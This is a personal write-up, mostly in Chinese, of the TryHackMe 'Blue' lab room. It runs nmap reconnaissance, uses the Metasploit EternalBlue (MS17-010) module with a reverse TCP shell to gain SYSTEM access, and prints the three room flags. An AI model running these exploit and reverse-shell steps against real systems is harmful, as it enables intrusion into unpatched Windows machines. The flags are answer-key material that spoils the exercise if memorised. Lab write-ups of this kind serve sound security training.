Blue (Try Hack Me Writeup)

URL : https://tryhackme.com/room/blue
IP : 10.10.158.118

Contents

Recon

Q: How many ports are open with a port number under 1000?
- nmap -p 1-1000 10.10.158.118
- 回傳 3 個
  - 135/tcp open msrpc
  - 139/tcp open netbios-ssn
  - 445/tcp open microsoft-ds
老規矩習慣的 nmap -A 10.10.158.118 看看
Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
- nmap 看到的 Windows7 版本拿去 Google
  - windows 7 professional 7601 service pack 1 exploit
- 就會出現 MS17-010 EternalBlue

開啟 msfconsole
- 搜尋 search MS17-010
- 選擇 exploit/windows/smb/ms17_010_eternalblue
輸入 use exploit/windows/smb/ms17_010_eternalblue
- 輸入 show options
- 設定需要的 options
  - set RHOSTS 10.10.158.118
  - set LHOST 10.14.7.198
輸入 set payload windows/x64/shell/reverse_tcp
輸入 exploit
- 成功拿到 shell!
- 輸入 whoami 可以發現，其實已經是 system 權限了

Flag1? This flag can be found at the system root.
- type flag1.txt
  - flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
- 他說 Flag 存在 Windows 存密碼的地方
- Windows 的密碼 hash 存在 C:\Windows\System32\config
- 裡面有 type flag2.txt
  - `flag{sam_database_elevated_access}
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
- 其實我覺得這裡有一點點暴力，但這一題真的有點通靈
- 已經發現前兩隻 flag 檔名是 flag1.txt , flag2.txt
- 所以我想說直接在 C槽根目錄爆搜
  - dir flag*.txt /s /p
  - 然後就噴出來ㄌ www
  - flag{admin_documents_can_be_valuable}
  - 這也提醒我們，可以觀察使用者的 Documents 或 Desktop
    - 但據我所知大多數的台灣人並沒有用 “我的文件” ㄉ習慣 www

25 7 月, 2021

steven